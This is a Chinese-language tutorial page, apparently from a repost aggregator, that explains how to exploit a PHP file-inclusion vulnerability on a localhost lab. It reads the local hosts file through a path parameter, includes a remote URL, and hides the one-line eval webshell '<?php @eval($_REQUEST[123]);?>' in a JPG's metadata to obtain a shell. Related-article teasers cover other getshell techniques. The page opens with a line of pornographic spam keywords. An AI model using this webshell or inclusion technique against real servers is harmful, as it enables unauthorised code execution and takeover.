国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell

這篇具有很好參考價值的文章主要介紹了【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

文件包含漏洞的利用

讀取敏感文件

我們可以利用文件包含漏洞讀取任意文件,讀取文件的時候有利用條件

  • 目標(biāo)主機文件存在(目標(biāo)文件的路徑、絕對路徑、相對路徑)

  • 具有文件可讀權(quán)限

  1. 提交參數(shù)http://localhost/include/include.php?path=C:\windows\system32\drivers\etc\hosts,讀取本地host文件

【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell
  1. 提交參數(shù)http://localhost/include/include.php?path=http://www.cac.gov.cn/2021-01/22/c_1612887880656609.htm,讀取遠(yuǎn)程文件,加載遠(yuǎn)程服務(wù)器上的文件

直接包含圖片木馬

可以利用文件包含漏洞直接包含圖片木馬

  1. 在include文件夾下新建wx.jpg圖片文件

【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell
  1. 點擊文件右鍵選擇屬性,點擊版型信息,選擇版權(quán),輸入一句話木馬

<?php @eval($_REQUEST[123]);?>
【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell
  1. 打開瀏覽器輸入http://localhost/include/include.php?path=./wx.jpg,進行訪問文章來源地址http://www.zghlxwxcb.cn/news/detail-501890.html

到了這里,關(guān)于【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • PHP文件包含漏洞(利用phpinfo)復(fù)現(xiàn)

    PHP文件包含漏洞(利用phpinfo)復(fù)現(xiàn)

    PHP文件包含漏洞中,如果找不到可以包含的文件,我們可以通過包含臨時文件的方法來拿到權(quán)限。因為臨時文件名是隨機的,如果目標(biāo)網(wǎng)站上存在phpinfo,則可以通過phpinfo來獲取臨時文件名,進而進行包含。 在給PHP發(fā)送POST數(shù)據(jù)包時,如果數(shù)據(jù)包里包含文件區(qū)塊,無論你訪問的

    2024年02月16日
    瀏覽(23)
  • phpinfo包含臨時文件Getshell全過程及源碼

    phpinfo包含臨時文件Getshell全過程及源碼

    目錄 前言 原理 漏洞復(fù)現(xiàn) 靶場環(huán)境 源碼 復(fù)現(xiàn)過程 PHP LFI本地文件包含漏洞主要是包含本地服務(wù)器上存儲的一些文件,例如session文件、日志文件、臨時文件等。但是,只有我們能夠控制包含的文件存儲我們的惡意代碼才能拿到服務(wù)器權(quán)限。假如在服務(wù)器上找不到我們可以包含

    2024年02月12日
    瀏覽(22)
  • PHP LFI 利用臨時文件Getshell

    PHP LFI 利用臨時文件Getshell

    PHP LFI 利用臨時文件 Getshell 姿勢-安全客 - 安全資訊平臺 LFI 繞過 Session 包含限制 Getshell-安全客 - 安全資訊平臺 目錄 ?PHP LFI 利用臨時文件Getshell 臨時文件 linux 和 windows的 臨時文件存儲規(guī)則 linux和windows對臨時文件的命名規(guī)則 PHPINFO()特性 原理 條件競爭 PHP7 Segment Fault 利用條件

    2024年02月07日
    瀏覽(21)
  • 【實戰(zhàn)系列3】IIS PUT文件上傳漏洞GetShell

    在前段時間做某醫(yī)院??的滲透項目里,遇到了這個漏洞,說話話我還是第一次見這個漏洞,因為這個漏洞真的很老,只有在IIS的古老版本中才存在的漏洞,但是確實危害很大,而且最后可以成功shell了,所以也來做一個脫敏的完整滲透記錄。 提示:以下是本篇文章正文內(nèi)容,

    2024年02月15日
    瀏覽(16)
  • 實戰(zhàn)紅隊挖掘漏洞---用友時空KSOA v9.0版本ImageUpload任意文件上傳漏洞+getshell

    前言,本次筆記是記錄在工作中的打紅隊時挖到的用友時空KSOA任意文件上傳漏洞。 emmm,怎么說呢,就是又在一次加班碼到晚上十點的時候,挖掘到了一個用友時空ksoa v9.0文件上傳漏洞。 大家先看看長什么樣吧,大概就這樣!版本這么明目張膽的就展現(xiàn)在我面前,不找一下這

    2024年02月08日
    瀏覽(23)
  • 如何利用文件上傳漏洞-以及如何修復(fù)它們

    如何利用文件上傳漏洞-以及如何修復(fù)它們

    ??’?? ?? ??????????????, ????????????????, ????????????, ???? ?????? ??????’?? ??????????????????????, ?? ???????? ?????????? ???? ????????????????, ??’?? ?? ?????????????? 當(dāng)服務(wù)器允許用戶在不驗證

    2024年02月05日
    瀏覽(19)
  • 【Vulfocus靶場-初級】Tomcat后臺弱口令+War包文件上傳Getshell漏洞復(fù)現(xiàn)

    【Vulfocus靶場-初級】Tomcat后臺弱口令+War包文件上傳Getshell漏洞復(fù)現(xiàn)

    之前聽說過這個漏洞,也看過分析的文章,但是可惜護網(wǎng)實戰(zhàn)一直遇不到tomcat,或者口令破不進去,挺遺憾的,所以找不到實戰(zhàn)的例子來寫,怕自己忘了沒地方查,所以我就干脆拿個靶場來記記。 提示:以下是本篇文章正文內(nèi)容,下面案例可供參考 在vulfocus官網(wǎng)注冊一個賬號

    2024年02月09日
    瀏覽(19)
  • 03-WAF繞過-漏洞利用之注入上傳跨站等繞過

    03-WAF繞過-漏洞利用之注入上傳跨站等繞過

    1.繞過cc流量 通過sqlmap對網(wǎng)站進行測試的時候,如果對方有cc流量防護,需要給sqlmap設(shè)置一個代理進行注入。 防cc攔截:修改user-agent頭+代理(付費代理池) 修改user-agent頭: ? (1)加參數(shù):–random-agent 使用隨機user-agent進行測試。sqlmap有一個文件中儲存了各種各樣的user-age

    2024年02月02日
    瀏覽(28)
  • 文件包含漏洞及漏洞復(fù)現(xiàn)

    文件包含漏洞及漏洞復(fù)現(xiàn)

    程序開發(fā)人員通常會把可重復(fù)使用函數(shù)或語句寫到單個文件中,形成“封裝”。在使用某個功能的時候,直接調(diào)用此文件,無需再次編寫,提高代碼重用性,減少代碼量。這種調(diào)用文件的過程通常稱為包含。 程序開發(fā)人員都希望代碼更加靈活,所以會把被包含的文件的路徑設(shè)

    2024年02月10日
    瀏覽(22)
  • 【web安全】文件包含漏洞

    【web安全】文件包含漏洞

    目錄 1.什么是文件包含漏洞 2.產(chǎn)生原因 3.文件包含的類型 3.1本地文件包含 3.2遠(yuǎn)程文件包含 4.攻擊利用手法 4.1 file:協(xié)議 4.2 php://協(xié)議 ?4.3 zip://,bzip2://,zlib://協(xié)議? 4.4 data://協(xié)議 4.5 PHP偽協(xié)議總結(jié)? 5.如何防御? 6.常見系統(tǒng)的默認(rèn)路徑 7.文件包含漏洞的奇技淫巧 LFI+日志文件gets

    2024年02月07日
    瀏覽(24)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包